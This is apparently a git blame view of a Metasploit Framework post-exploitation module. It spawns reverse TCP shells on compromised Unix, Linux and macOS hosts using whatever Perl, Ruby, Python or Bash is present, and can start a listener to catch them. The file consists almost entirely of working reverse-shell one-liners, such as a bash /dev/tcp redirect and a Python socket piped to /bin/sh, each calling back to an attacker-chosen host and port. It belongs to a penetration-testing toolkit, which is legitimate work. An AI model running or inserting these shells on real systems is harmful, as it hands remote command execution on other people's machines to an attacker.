2011-10-18 23:31:04 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# ## This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2011-10-18 23:31:04 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'msf/core/post/common'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Post::Common
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Multi Manage System Remote TCP Shell Session',
|
|
|
|
'Description' => %q{
|
|
|
|
This module will create a Reverse TCP Shell on the target system
|
|
|
|
using the system own scripting enviroments installed on the
|
|
|
|
target.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
'Platform' => [ 'unix', 'osx', 'linux'],
|
|
|
|
'SessionTypes' => [ 'meterpreter','shell' ]
|
|
|
|
))
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptAddress.new('LHOST',
|
|
|
|
[true, 'IP of host that will receive the connection from the payload.']),
|
|
|
|
OptInt.new('LPORT',
|
|
|
|
[false, 'Port for Payload to connect to.', 4433]),
|
|
|
|
OptBool.new('HANDLER',
|
|
|
|
[ true, 'Start an Exploit Multi Handler to receive the connection', false]),
|
2011-10-23 11:56:13 +00:00
|
|
|
OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',
|
|
|
|
'auto', ['auto','ruby','python','perl','bash']])
|
2011-10-18 23:31:04 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
# Run Method for when run command is issued
|
|
|
|
def run
|
|
|
|
create_multihand(datastore['LHOST'],datastore['LPORT']) if datastore['HANDLER']
|
|
|
|
lhost = datastore['LHOST']
|
|
|
|
lport = datastore['LPORT']
|
|
|
|
cmd = ""
|
2011-12-24 21:26:20 +00:00
|
|
|
|
|
|
|
begin
|
2012-11-29 06:05:36 +00:00
|
|
|
case datastore['TYPE']
|
2011-12-24 21:26:20 +00:00
|
|
|
when /auto/i
|
|
|
|
cmd = auto_create_session(lhost,lport)
|
|
|
|
when /ruby/i
|
|
|
|
cmd = ruby_session(lhost,lport)
|
|
|
|
when /python/i
|
|
|
|
cmd = python_session(lhost,lport)
|
|
|
|
when /perl/i
|
|
|
|
cmd = perl_session(lhost,lport)
|
|
|
|
when /bash/i
|
|
|
|
cmd = bash_session(lhost,lport)
|
|
|
|
end
|
|
|
|
rescue
|
2011-10-18 23:31:04 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
if not cmd.empty?
|
|
|
|
print_status("Executing reverse tcp shel to #{lhost} on port #{lport}")
|
|
|
|
session.shell_command_token("(#{cmd} &)")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# Runs a reverse tcp shell with the scripting environment found
|
|
|
|
def auto_create_session(lhost,lport)
|
2011-10-28 14:46:49 +00:00
|
|
|
cmd = ""
|
2011-12-24 21:26:20 +00:00
|
|
|
|
2011-10-18 23:31:04 +00:00
|
|
|
if cmd_exec("perl -v") =~ /Larry/
|
|
|
|
print_status("Perl was found on target")
|
|
|
|
cmd = perl_session(lhost,lport)
|
|
|
|
vprint_status("Running #{cmd}")
|
|
|
|
|
|
|
|
elsif cmd_exec("ruby -v") =~ /revision/i
|
|
|
|
print_status("Ruby was found on target")
|
|
|
|
cmd = ruby_session(lhost,lport)
|
|
|
|
vprint_status("Running #{cmd}")
|
|
|
|
|
2011-10-28 14:46:49 +00:00
|
|
|
elsif cmd_exec("python -V") =~ /Python 2\.(\d)/
|
2011-10-18 23:31:04 +00:00
|
|
|
print_status("Python was found on target")
|
|
|
|
cmd = python_session(lhost,lport)
|
|
|
|
vprint_status("Running #{cmd}")
|
|
|
|
|
|
|
|
elsif cmd_exec("bash --version") =~ /GNU bash/
|
|
|
|
print_status("Bash was found on target")
|
|
|
|
cmd = bash_session(lhost,lport)
|
|
|
|
vprint_status("Running #{cmd}")
|
|
|
|
else
|
|
|
|
print_error("No scripting environment found with which to create a remote reverse TCP Shell with.")
|
|
|
|
end
|
|
|
|
|
|
|
|
return cmd
|
|
|
|
end
|
|
|
|
|
|
|
|
# Method for checking if a listner for a given IP and port is present
|
|
|
|
# will return true if a conflict exists and false if none is found
|
|
|
|
def check_for_listner(lhost,lport)
|
|
|
|
conflict = false
|
|
|
|
client.framework.jobs.each do |k,j|
|
|
|
|
if j.name =~ / multi\/handler/
|
|
|
|
current_id = j.jid
|
|
|
|
current_lhost = j.ctx[0].datastore["LHOST"]
|
|
|
|
current_lport = j.ctx[0].datastore["LPORT"]
|
|
|
|
if lhost == current_lhost and lport == current_lport.to_i
|
|
|
|
print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
|
|
|
|
conflict = true
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return conflict
|
|
|
|
end
|
|
|
|
|
|
|
|
# Starts a multi/handler session
|
|
|
|
def create_multihand(lhost,lport)
|
|
|
|
pay = client.framework.payloads.create("generic/shell_reverse_tcp")
|
|
|
|
pay.datastore['LHOST'] = lhost
|
|
|
|
pay.datastore['LPORT'] = lport
|
|
|
|
print_status("Starting exploit multi handler")
|
|
|
|
if not check_for_listner(lhost,lport)
|
|
|
|
# Set options for module
|
|
|
|
mul = client.framework.exploits.create("multi/handler")
|
|
|
|
mul.share_datastore(pay.datastore)
|
|
|
|
mul.datastore['WORKSPACE'] = client.workspace
|
|
|
|
mul.datastore['PAYLOAD'] = "generic/shell_reverse_tcp"
|
|
|
|
mul.datastore['EXITFUNC'] = 'thread'
|
|
|
|
mul.datastore['ExitOnSession'] = false
|
|
|
|
# Validate module options
|
|
|
|
mul.options.validate(mul.datastore)
|
|
|
|
# Execute showing output
|
|
|
|
mul.exploit_simple(
|
|
|
|
'Payload' => mul.datastore['PAYLOAD'],
|
|
|
|
'LocalInput' => self.user_input,
|
|
|
|
'LocalOutput' => self.user_output,
|
|
|
|
'RunAsJob' => true
|
|
|
|
)
|
|
|
|
else
|
|
|
|
print_error("Could not start handler!")
|
|
|
|
print_error("A job is listening on the same Port")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# Perl reverse TCP Shell
|
|
|
|
def perl_session(lhost,lport)
|
|
|
|
if cmd_exec("perl -v") =~ /Larry/
|
|
|
|
print_status("Perl reverse shell selected")
|
2011-10-23 11:56:13 +00:00
|
|
|
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " +
|
|
|
|
"(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
|
2011-10-18 23:31:04 +00:00
|
|
|
else
|
|
|
|
print_error("No scripting environment found for the selected type.")
|
|
|
|
cmd =""
|
|
|
|
end
|
|
|
|
return cmd
|
|
|
|
end
|
|
|
|
|
|
|
|
# Ruby reverse TCP Shell
|
|
|
|
def ruby_session(lhost,lport)
|
|
|
|
if cmd_exec("ruby -v") =~ /revision/i
|
|
|
|
print_status("Ruby reverse shell selected")
|
2011-10-23 11:56:13 +00:00
|
|
|
return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" +
|
|
|
|
"while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
|
2011-10-18 23:31:04 +00:00
|
|
|
else
|
|
|
|
print_error("No scripting environment found for the selected type.")
|
|
|
|
cmd =""
|
|
|
|
end
|
|
|
|
return cmd
|
|
|
|
end
|
|
|
|
|
|
|
|
# Python reverse TCP Shell
|
|
|
|
def python_session(lhost,lport)
|
|
|
|
if cmd_exec("python -V") =~ /Python 2\.(\d)/
|
|
|
|
print_status("Python reverse shell selected")
|
2011-10-23 11:56:13 +00:00
|
|
|
return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," +
|
|
|
|
"socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" +
|
|
|
|
"os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
|
2011-10-18 23:31:04 +00:00
|
|
|
else
|
|
|
|
print_error("No scripting environment found for the selected type.")
|
|
|
|
cmd =""
|
|
|
|
end
|
|
|
|
return cmd
|
|
|
|
end
|
|
|
|
|
|
|
|
# Bash reverse TCP Shell
|
|
|
|
def bash_session(lhost,lport)
|
|
|
|
if cmd_exec("bash --version") =~ /GNU bash/
|
|
|
|
print_status("Bash reverse shell selected")
|
|
|
|
return "bash -c 'nohup bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1'"
|
|
|
|
else
|
|
|
|
print_error("No scripting environment found for the selected type.")
|
|
|
|
cmd =""
|
|
|
|
end
|
|
|
|
return cmd
|
|
|
|
end
|
2012-03-18 05:07:27 +00:00
|
|
|
end
|